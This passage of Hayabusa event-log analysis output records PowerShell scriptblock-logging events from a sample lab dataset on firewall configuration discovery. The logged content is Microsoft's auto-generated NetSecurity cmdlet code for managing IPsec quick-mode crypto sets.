[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 
'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { 
try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { 
$__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 
$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
